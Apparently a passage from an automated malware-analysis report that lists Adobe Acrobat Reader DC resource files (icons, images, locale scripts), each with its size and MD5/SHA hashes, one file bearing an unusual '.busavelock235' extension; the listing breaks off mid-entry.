SHA1
93f4d327479e68a3add01a94430d7a92853dbef9

SHA256
3944421c2fe02c836075ac8d7717428a2629e24b175a5906fb9264d7f21f8f79

SHA512
80c3f36eed69ae4c7802a35df4897d8cc2360b9bcfc1395e88ce6db780e06f4b7361f3116c20f2b3245e0585145ddd375c15eac9c09da75f777e865c39abc7d8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_backarrow_default.svg

Filesize
2KB

MD5
32e93016539c0f881f78a2b73f7e87ce

SHA1
0e4b567baee6b7f61e1f72abde3521c11db2b392

SHA256
6293b9cd795f5074a70d19ea652cb2b1b9b75c0feded48e1bcdfbdc819315baa

SHA512
8c88d12298b0046537f752a7013ba5f7c7c35bfc7945d9e80f7b0ac85ee309a01ac10c1d63e40f14b1320d7d3289c79025b2d28de7c7f173653475b5a973dff9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg

Filesize
2KB

MD5
fedcd5a367caa2a79a7049e2dc1a6652

SHA1
88f6821f2a593f8d935b02a2f29e7de60dc67496

SHA256
b4dc4c87dfd73d7d6d4bf1f20c277dcfaf6a7c36107822aceef14982b2420cef

SHA512
5fd55771f5a911adb6c4c472b6cd5b33786c2fa1e548c0f81d661f2393c296d80955c69f748a83f63a040a428de368dc8d211341752cc357f5b5ccb8d399a045

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_editpdf_18.svg

Filesize
2KB

MD5
60c3518fc9ff65bddc0f17f7341c8853

SHA1
1792b5e3428bfc1663e8938924c3c45b2d1047ab

SHA256
ff7529402fcd9e834d40abb41318e7c78c100bdc3bf4b452c6d2edeb48c9f36c

SHA512
5d00382522da875e92974a9e9ef3d65e5cb54809bb16e1287157d07afec9b0d3d8ce9a50f2c7aef6ab0ca5827cf2e3872b2781665ddbc65898036f8ae161c139

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_export_18.svg.busavelock235

Filesize
9KB

MD5
a7df920de3a5f806db25e3ff3dee8ad9

SHA1
e3921d089fbcd50779a9d9f396867f1c18229c9c

SHA256
5095404f39ccad0a67e7b65a065899e5531285f57c1249adcd17c03cee48f801

SHA512
e64dffdc3beee483da6849eaed691d2a50ffe45423e5b306767cd58eec4255eea65c1c89854070e904b26379df245e470d65916e5aa7436b67bcdc5db32eeb4a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_fillandsign_18.svg

Filesize
3KB

MD5
dc7c355b65013edf12a196d4e216610a

SHA1
ad165173c0a4699a17310408596ad78d0344ccc4

SHA256
1716e38ea44c0cae4f1414eabb0cedf90f035da345b03e17c0d993ae7687939e

SHA512
d352612c8f541d43035fc7380805b1475fbdf5e177ee8888f8d188225b8aeb6e71685a461826776dbce878ddcbb4f3771161502a7f4af831b9ef2bb717c0a9f2

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-default_32.svg

Filesize
2KB

MD5
5fb71cff41d581d565486bed5062ae27

SHA1
808ad8f7276aa652a82c3a02cecae89dce0ea345

SHA256
30dc487b5a3668de21592df9a9165b49790fe68a0aa79fe618908413270099b1

SHA512
42c5734d1ccc949cb1eb5241982d0670b651ec4067b631f41f71c7a88342922ced2709847f24ab899bb939ed8cbd920b22e82c1e16711af3a5ab907793ffd05d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_move_18.svg

Filesize
2KB

MD5
44e84b4aaef5dde6d7802d5abadfcd50

SHA1
9753ad56e0ae748e09feb6466fa76ac7eb3c0a33

SHA256
eefb4ec636c461814bb26c155229413c4280215ee2bb30c4534ad9c67362a3c4

SHA512
e348e6f3826218008b7403902e7ba75aa9fbed7ba52d1fa9b44c5f63890c2f77683f73216ba1ff167b432dab407c4308dbcaddd46a5802adff3160bdd17b70c6

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg

Filesize
2KB

MD5
f2c7ab2ca3f7ded59d16e625ec61c931

SHA1
9237508333ca1ec884286dd0afabc49ceb43aca9

SHA256
08bfa2c11560d58c63ce6227103605384de3a98ac6b49fffb991096bddc7b19a

SHA512
9668a50231302d92338c705c65652ea72a2bef30ef7d672dc998959051b5ef7c87ab39a7f37321561c5848fb397a078f1c7ef948cd8e2c9d36cb9ad3ea98b779

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_organize_18.svg

Filesize
3KB

MD5
208ef379139b17e022e4ea49fc7cbc26

SHA1
c35eb562f7e648264b1e1efa7afc1fb71d66fad3

SHA256
f79835f61de76bf576c4e7615f3fc380e9b01c6a3ecbc6aa33728a280890af95

SHA512
0f596acd53074e2d5e961f00b060a9c296d4bd9d83b196e2f6b968f02cd996bb6f021fba121afa069149feea19123bd261ca0fa3d7542785179a618a6f193ec9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg

Filesize
3KB

MD5
f92651439accd1ed157caba25fccfdfc

SHA1
d63265100743255c166394b61802335fde62382e

SHA256
77eb85c95fe97da6a4cbc29eb9ebc0592fb18ec0b88126a7c83baa41ed4f68f4

SHA512
8eaeef93f0820714404bdc5b2e2581ccaedad5d65343b945c914c8ea4efa9523ab7db32921a20c768bd9ac7f68596ae710acd561fb669ee307b08e94742f2138

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sendforsignature_18.svg

Filesize
3KB

MD5
afdc1410df2dbf23a0786fa96f8d04c9

SHA1
79bf07534228ab455a96a0cddee4edc958177c60

SHA256
9abae8964553b1a19fecc5144accfdb0485d3ff6e4ae8f9fc5e3fccae557515c

SHA512
e792abeeb0aff6569a49e322d09cf60e7caf9da10cd1ecf803ebfc95e8774ebb35ed8c0c01f34d9f9f63e90dc9b2030bfe778bfa8035c4cd2901b450094128f6

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_share_18.svg

Filesize
2KB

MD5
50eb982671639be7562de9ed2efe9c8d

SHA1
b1a798041b97d3e44934bdbb8639aee11276390e

SHA256
7095cee5e6800e95ea96d277384bf65be337f1ac1ae331d7752502ec58f5ba96

SHA512
ad69778fbdd337c95550d30cc51abf07c20b1669191f2b999b843f8deb357b18adee283deec769912865a0c4ab5d543a01fc3f6f53d2144b595c3fa90bf6d016

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js

Filesize
5KB

MD5
cf0f4a4cc1ccb37baa91dff53ec5570f

SHA1
7258d7bed00ebf1c056a25cfe17eeb1166580e11

SHA256
462a79f82dee21f29234ad9355fc7326317de9412cf7e568efc52d27191116df

SHA512
40ef0fe2c3c2a5cbec791b3c66e6eae151342adc439585002b1da28f44747efc1cce2311bd8254c313394c47d0f3fff249a8e2accc96f495ceb8f593de057c69

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js

Filesize
29KB

MD5
90121e1b788635ecc943af51017f2397

SHA1
5876830b5d3c578c6c96216e46989b8b571f7030

SHA256
ca65fd85b45bbb27be747de58e60bf424adbe5285536beaf9a32c599971a4b38

SHA512
f2dd052a2d2e58987f0eba02a8ffaf6683775af260bac38addf85b983b882fd0a0c01632fd4097f6bc45df32acaacaefd0193d09e443f3a9ef75f16fd7e9ee2f

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\ui-strings.js

Filesize
9KB

MD5
23b9ac4a44911f64b7dcfc99f9956d44

SHA1
46c699ccad3699da9512c8b106cb7b6c74d72cfb

SHA256
5a92094309cd20de97d54475881982726b8d9325daac688c2baeb1e63bf07f7e

SHA512
39719e45f11dbeb69f0ff15484bca520e188a1c675d085f655d78a145b64a1606e093eec5b635e51f3bb42e06c12747e3bb5357afa9c808cbdfaa111d6d97db5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\ui-strings.js

Filesize
2KB

MD5
50c5affdeef2cf35c6ea38e72ba7abd3

SHA1
9f50a8f5c062c3a70503bf104847f4cacdd0d747

SHA256
e7c4956844a6aa9a2012f2094432e96a34de3b49c55466bc308485ac50d833eb

SHA512
47a1b5cf6d4510ffa966578226dc67cdb1ae5ac51fbf50bc12d5db3529a397b598c0c58936dd6a267629ac6ba9dc62a26834333ecf698e2fd88b414dc759c1a0

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js

Filesize
5KB

MD5
eb01283b1ccb1e120f99581747e9bcea

SHA1
dacb3ca3b8d2023567d975fb60222ad6acd07524

SHA256
b3047b36a47751c018496bcffc6887ccd833562a814ab955c968f8c1dca3adb3

SHA512
f4676d714e77daf102aebad428fc6a3bede52155ac188bd548527d89b803dfc11d1ba40c8a4fa1febaed1d82b04628021f10d9482c171b2a595666ed38262de9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js

Filesize
3KB

MD5
fba83743ca88773780b15a06bb74ef18

SHA1
f3823b61d642b8227964ddb9bbe8baea7b933b25

SHA256
f21eddaa2b67dda3934a5ce0e2fbfd3c9d2f31d2fd86de7902ed0b3ac2ab65c7

SHA512
5b280846ebb93de1294a680602deb74ebcbf6c6f00bdee25b83340517fdc4152cad78042560cc76bb9786df19307c910dd0cddb1f89109c538a30dc28b13c1b6

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-tool-view.js

Filesize
394KB

MD5
ddfde8b65b86182d2d353bdc98a7d462

SHA1
0afe6338e67fced91da5e3afec1e263e3c0f4ae8

SHA256
4f43438451466fa251a959a29f7d84a3c62ddd7e97ab13a05d90a17ba2e55eaa

SHA512
fe0189356ce0164cb757ef5dbf94606152f4efe11ff86fab75df42cf34ce65a246b92ca111d486c1d43034e944ba81db6483518c37cf4e87d49e87c439f79399

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js

Filesize
176KB

MD5
a603f156f3a41af0a20cd51dd3de1383

SHA1
483ee3b84ba005177b6b973554ffddde984006f5

SHA256
6b9dd9cd26b2e19be89edd5fadc43d3b502d181f4c68b8e7b66c3b0909359ec8

SHA512
733a31cf2d86cee1fa816e9b87e16f643dd67aa5d0503d9628828062681a4878be6c238cd89312ce458e480664a60d353239616c9abd582a6d28e0642e1d83c8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\ui-strings.js

Filesize
4KB

MD5
ff4644086a6f4de04f54b9a2b09ec838

SHA1
082e6f615f758a97d36f43f5cc58f174276b29f7

SHA256
0297f19e8cfcdb43199e6664d5dc3f343fe4002d33e4608a17984a3a3cd11157

SHA512
0c539dc3da79793e5af66ba2b4323fc7a2ec45cacd9b0728d6b8d5c6862a1b6142599ee775f180b2dc87c11a28d49dda3ec88f46c3586fc959053a8a7601ce04

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js

Filesize
2KB

MD5
7ffccc8aa1a4d4c7d3b06a745a1ce4dc

SHA1
0abd46a5c8882f030306b7b61402dd323e7d8aca

SHA256
a0799c982a64f031bbfec7f7771e60d7a39e72bd9607bdd1abedb585d8f1ac56

SHA512
4ff7997b1853f8844279c4af7b9c45c74cbdd9cfea15be761f6570c0bc7650437fc8628e88dbfa9273d2bb6d62b652d7ea17bd0f2da3c9a3da6e67f4c2c7163a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png

Filesize
2KB

MD5
9015af56e420a03c6f4b316b63d866c1

SHA1
d4caf78d92d80c9e375e07aa0d06eb9ef52947e5

SHA256
ce7e0530409052c9f9ade4dbcc4f0e6869ceb6708e80e5ea72417488c8d987e6

SHA512
7d310a50033fa5f72ffc0e0092b23fc7a2c0b581569b1c86cfca192abd0b48acb29c2a5740b3424269bad437bb2aba6aac729ee9e916caf7d3e628c6981f901e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png

Filesize
2KB

MD5
41e2fd34d7be37ad620a59b939fb82cd

SHA1
099e64c1ad3dcd48d14ced79c827a1c0b81d430b

SHA256
8d93e38713361b51a72551c6df77e7e89e44c68644acf8d4b23b532fc20e1e32

SHA512
73ab65cd12598299945554f49d6fe6bfb2f938f1c46014131d858c9232d6047840705df1e786dd9a7d3f040df2c9e5db4ce6540665b5ec1f815913e65eb46e59

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png

Filesize
1KB

MD5
1f70eebfa0c05c90aed6fc1d5d6a1605

SHA1
cea2c855c872f88da203fc0464d273f11b247ab2

SHA256
1d202b97ec78af696229b14abe926f48093df7b8452bf56a91084ff052ef3907

SHA512
aa605f3e255dd42b45683335b00e4054fc3a2a25c6062064f64b0175bc502090ad2a360c41366dcac703cdc7ff8a59e426dd100108fece27ada145061d94ad5a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png

Filesize
2KB

MD5
5c99fbfb0dcb347cd80ae556906fb560

SHA1
b693e70651c72f9f3cf8f8dc411a9687cf123afa

SHA256
c00bcd959338a46355d57b978d62974e97d33ab3204c3e51145cd9cac11de460

SHA512
40edaca897434950b31c500060617d3ecb5dcf44877e2e4a12b5695dc41cef21011e68b6a0c758dd6232273cbf862e29ac841f904caf3610dc5f421f8431e688

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png

Filesize
1KB

MD5
d0580573dc8c870a57671528f43f95a1

SHA1
98eae26701182653097b64b57a8c81eb26988c02

SHA256
4fb0cee0a2c77b2df6e3266bc3bed6e28cb90c793b1565814a1dd1ca68c7b15f

SHA512
7451996031d48f095da97e57f08c8b87db4fdd9a6c04991045e68c6bf29e11d43d0b8fcf8a7bcb59140e659d0dbb587f05e3ab1ff23f6c89b9dea80c86446e7d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png

Filesize
2KB

MD5
bc8ded403bf2f24cddc148308c4de3e7

SHA1
b4a3780711aebc5eb4b91879390ae44c46ed7753

SHA256
a5ddc2d91456e5b9394ad2fcc59fa7d798f41596e3696bdbb91a9eeaf9825801

SHA512
3739d53f8b2685c69f5061e63565566b7929e6721b49e20974eac892e1f3a587adc2f12c31ab020b8c17a26c99342a9199709bb3105dc212ac3b648761477f38

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png

Filesize
1KB

MD5
5b70f83c7cbcfe14869a0a68c445e7cb

SHA1
add37c5fa8a51dd64306ef2f6cc6829d8ba8e0b8

SHA256
126eb81ea1892dd248e037c8622778a1aa518c8de25e9b802e5b6ab79ba8fe06

SHA512
16058fd632686b5be86360ed367865f556f2ea756fd0e9742e54311fd7268bd23b5cc3b656d45c48e7e3566ef0e153e55da410339feb3ea3ba1200213219519d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png

Filesize
2KB

MD5
153b3347cfef32a477696cc227d73e4c

SHA1
3081a0750ab10c4e7db6da665cf2c7b7e85570bf

SHA256
b34b67c3155e4b1376d10f1e0bd80006f1703c8a8ab8cecaeab1c58ec1fe85e0

SHA512
5799cf52e12bc09abd0789cc36a4897a331734369f169dccf2410711255bcda7fcac05411d5c0069bd3ef8a95631d21fe7633d49d4e18e0541fe5eb19265383f

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png

Filesize
1KB

MD5
b45df7639cddb37c7aa33dbf3da24121

SHA1
26745f00b8e987f3f7b7a10a26010aa291d2e96f

SHA256
047f21a7e5836812c3021ec1405fa59448befdf92ed0a33435180caf9609580b

SHA512
d1f358a0d597026fddc1e157216f788404ba953f4d84b6e4186d2e4491df2b2fc8d3ef62d073c7e409a293c3d37b76d6626ba3df9bfffbc51f5aca040dd8356e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png

Filesize
2KB

MD5
11fa6c0bf2a15c5010235457b2f35812

SHA1
3432ee1f2359deae5a59b785a5fcd61db8854c2d

SHA256
78d3b182f67fb1726ff27a14880a31d47973a0e10f8180eb2c7a65c27344f6f0

SHA512
dee60e69c8d3706b54c3cfdf53361110216d5eae4f3ffad4666a7d33c24de7f8625b7937324e955280c6ce73433f684575705a9c1ab5b3c453adc9eff1f7d908

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js

Filesize
2KB

MD5
a3ed289e1f464ad6f3c0d9b3fa1143d9

SHA1
d913907f5304168070328e39485f08820e25abd6

SHA256
34265e6e0ac64f7370e8bbc5650e49c765b17373a361862dc4b05018a2a5116f

SHA512
ba16e23009715a26a4560f23a43e3de95215fad47a35940c6652bebfe36f77b69801c5240a787e714f036a7e8ea575b10a4803b99876d1d80774a460bbee86b8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js

Filesize
2KB

MD5
cdec03f2f6a54241f880a2874f0300b6

SHA1
211c62c47ce047f8ea5de9ae576e590bf9f7c86e

SHA256
f8078603ed95240c1f9a575356243d6d4b43d8c75a400806c17fe3a009a0fb22

SHA512
c30ee2f8d931325496f8d570f88a51694d1003d719adc0b0fe950c6a8daf815f7e2faecc4fd05c019ebf47d7fd69a4304d4cffb4c916dc3ce1c202a664dad34c

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js

Filesize
10KB

MD5
ec44f7766afc9130fef34e36f3e1994c

SHA1
9a8891bb0a163b8676af37811e5990f1159aae49

SHA256
6265770ea5f6ed47b0333fddb9a85a0864e397376175110aeac0f99cffe98784

SHA512
c5233d0de3e1e391af1b1bb086f5bc03c7f722edbf4d2750bb0d9cae58e2917d86b194914d76a677986fa3d255ecd7c0e623eaaaca70a7121551489ae618ac60

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\ui-strings.js

Filesize
2KB

MD5
9dbbf8ebe759b67a77bcc20c136752d4

SHA1
341e1d927a45400d8f9c9f4b676bb5a42e965cde

SHA256
b5e7469e087093a7c455c317e3bb4fee9cf478523a184ab243f6d86b793a43c1

SHA512
67bdc5fa5025355089e9cb4951f02cc86cec57fcdfce454ed11ae3a3d5d39b17ddba673658d98319dc55991f0d929172e725c546aaab01c6ff6980c8764e9bc3

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js

Filesize
2KB

MD5
f0b27689bcb8065a0f28b753af2dabf7

SHA1
d385b5954eb1483739bcb6ecba8e0fca60cf1591

SHA256
90f641c006b4bb5b6fe17331a22d360de5aa7d6c8fc8bc46d371460538f79328

SHA512
a7d2987ac0d047b44e660bdbb1778b13997aee99340a35f2d1eb0ab6321901468e5ba9c7e8d40a785a2e1988ecb2f0ce4590b9d46d5208b2a378728a0d908cfa

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\ui-strings.js

Filesize
2KB

MD5
de6f94dbafaa3e1370be517be51185ce

SHA1
06174766d02a1fc4f11cc7214408c5278c70e2bc

SHA256
012a91ed0134770d6bbd0b60409f893db25474bc4588f01fd2717ea74ebec440

SHA512
61969b075fc839ef5f2fd01623e16ed52052c9dec3c9260b09683a729969233101fab0d3fadd017bc259b5c882c58b148800d71fc5b43f4f56a67164a6624856

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png

Filesize
9KB

MD5
2527d96098f98cf14ccb47d0f80193b7

SHA1
30badc65d234a03c20aae8c37374c80f9c3d1df8

SHA256
713f448f9bd76ec5d033c45b10c09f5b61dbfc9ed2cbe5456c9b728dd8f6830d

SHA512
6903ba7031368dc9efb1bc34c4b4d72a5c503afc8ae2ea876fe68d254351d2868c9aedc5999d93028bac0d65bc460aa0b9dc07e62834a45b723c8faec4cef631

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif

Filesize
9KB

MD5
fb489b92c37931a7ace2511c77289ae3

SHA1
c767e7210916b12cc600f45e5bb25eff7a46c97f

SHA256
e3cfa179eed4fe895ba16fb692116a5c3ec7b2aec6a913c959fb899e7960e04b

SHA512
915b6cb80164fccb61ed3b078ed5b23ed87def0a05419bed3900192568c8afde79fc9c829e3502e5d4e9fe7d519cc0ee2cb70119e40f8333d029a01211226b88

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png

Filesize
16KB

MD5
be1f1c4a35c146f474fe6acf872653ed

SHA1
b2c4cc3de5a348a1f7a8c566fb464e4971d36403

SHA256
21288e632aabdccc7bcd1189a9d3e27111052d39228c3aafa50374a74df893c5

SHA512
85f703ec239b846ea6ca2f208659dbeb5617e0b3100fcc6a0eb1018cfec3961ad37428b4721c49d46e4246ab311ec84c0a596c7eb01939ab0bf091a20a02da0a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png

Filesize
9KB

MD5
b3df1e2f6e7622ec27655beb4cc4e008

SHA1
ab581171b2335d40bc30a6ef877a988767cbf8e5

SHA256
540e9f7bcf0f9a6d6ee65308b2ce2cfeb0051e8210b105381b9dfad0087b7144

SHA512
d77a38b11444834ac1df8061446f8132f02a9a95062fe6a1091b4877edb539ccae347082f130e93558da572cb0ff4e161cada776634735a728ce38ac6d87db54

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png

Filesize
18KB

MD5
80c5025e0fe7ff0c9ace493c347d5074

SHA1
d22b5619b70f2d2e618fdbaa0c2a9108ee4ee45b

SHA256
7f43fa2f97b06cb215aef5b0acb92ce5ed7db691338f6d775b0c8e05c2af0243

SHA512
cb3a368b21c8dbfac367b325bd9c25e1976eafea1c3d1f3ab28e1f0b4925a93e94bde89b006d623af63657bb86a1689981b9d1de8505d2bdbfc036e51fe7d63b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\ui-strings.js

Filesize
2KB

MD5
2e1a68be5ae63791f9f7a2f5efdd6c5f

SHA1
73f87df6ef148edb264a2843e7d63e23bd7d4cb7

SHA256
2d72b994eaa375bbf69318ec09aa1305ab7b9cc1d781414774687816a029885a

SHA512
968d7f323a36dfddae148e7264ff8c63d556efbfd9f9447f2fa8b71c5f3e5d9198a8eb3d9d32655f6cb8f905190ce141bc296e3ec9cbe6afe180f27eb57fae3b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js

Filesize
2KB

MD5
cdba32711b76651e6f8769028027eb0b

SHA1
396f3b4ac219525b2d9c62a960e9c232387b9c6e

SHA256
cea225775dc19a086c5022a0582ff23d91d25ee9262eecccc8f03f4e56d0208f

SHA512
3dca6b9ea86581df9c2f4ea1968b0325a2f755381512577bbb9baeab0e7ce887a68982bdd170a6b76a5f9c8bb5bbd300977ec9cfaacacdadfdf2df39cf6fc429

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css

Filesize
2KB

MD5
9eece549734363e99ff02956aced4620

SHA1
ec5a525e5f40799d4fa0056fca595047c65c17c3

SHA256
93f56da0ed0b1a6d6ac36fe7fe785000acafcb676b4f76a3ba1296be1ec303bc

SHA512
a1bbaae4f99042de10d94b89f4c2085648b9bed5741b3821b3489fdcdfc4ef71676e8bf7c38ebe66a53f26c67ba8bf9a76cbd21d21ed2f3986cf25c70942d935

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png

Filesize
1KB

MD5
a14456176e4fda3ac21efefb8542a409

SHA1
8a24bc6aa37eb97895e090f414dc038689788506

SHA256
b1ce36632f60a134b95104056dac6a7ed07e102501e3f87392d1a425e792503d

SHA512
e556411d2f64cdee0cda08c3e59116b55d22acf83ae0548f77e44cb5814ba22ff63df54ffe85632037af8d927da2c0f958e74a1b3c6e2b991e2a83a9fbe6d135

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png

Filesize
2KB

MD5
186ddc2969f37e9e03409a58e389ce75

SHA1
da725453a90d9b0b22491968ecd0dc146a50be75

SHA256
cc02e405f4569ec804cc1351c16aa8d9119cd670dbf242b225f8624309e44e6c

SHA512
080590576e504af0f2d9ab6791a8f2007713e0d1dbb9cc97d5a160698643bdf0f873f12ec1d2fab967fab4b8e7b02ed012adbf3d850219a88fb5e7f6e3db9fc4

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png

Filesize
10KB

MD5
a33f69bffee65e9c5cc5b93fd3078609

SHA1
928220cdad027d552f17d276da09eeeb304d8b2e

SHA256
d803cbd8e061002f5de085fe3894b6a3d0c20a78aeacf57d4aa6ad30db6d0f8d

SHA512
70773919fcc933df46b007c53d78e1e8dc2c34655422589f68465c3e422a748eade56e186545774cc749b57bc64983454f44d1b67d32c6a7eda465bec888d2c0

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png

Filesize
20KB

MD5
ce36af01d1221740e6ee44d816c3584d

SHA1
f41812cb3f793ad54014ad2ce93f3f9c0c8ab2e4

SHA256
4c5e5d77cd044f7ee9867120bd8e0c7958eb0c82795941d2234f68ce3ce93dfc

SHA512
b767e1f8e168ce3808789a1bf2d54a6960c8e4faf3cc51fa8953f655cb85506587e24b2fb8b8b096b1955f173a3afaf14d4b6e32defb07d7a9f4e80e24df3d82

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\ui-strings.js

Filesize
2KB

MD5
29a69064d667d1ea6be8814d68050155

SHA1
6eac40156020c70f000cc780c5ad6d92d60c5de0

SHA256
0972b1ad3e1d0122353b47a7f5d5b0c499f66788da0813cdcd28f45abfc46d56

SHA512
d02faa045d3da5a6c5896ec08be77c384238c2c13712661cd03ea67743bd5c43ad38d2ca17b390b75fc4f81a221b78c0438cec97d54c3dccbca3b79226ed6ab0

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\ui-strings.js

Filesize
2KB

MD5
61396613c7f31eaddb280ef7ad58bf93

SHA1
5476ca791fe44c17332914d62b176442a9b34a72

SHA256
3141128b9086b521c9b703be21eb7dfc05a1ad0c34dab4e9611e3c3a7e7ce4ad

SHA512
45900b187ba7dc390ed074e9dfbcfca406ed8c4c7bb047453d6ca394707d9ec9e1443fb100d0c3eb9cc7a568e5527a4896246628465143550b3c968cb8fd4ba5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ui-strings.js

Filesize
2KB

MD5
fe52da22cf42ae3f11e2a7ed6364c51c

SHA1
55af13cbb2baa5783147a2c96d36a0377d91d710

SHA256
c7eaaee92421b46aa195735d1adeed08b2b58e3f05056ecb55b21c2fa7285fdf

SHA512
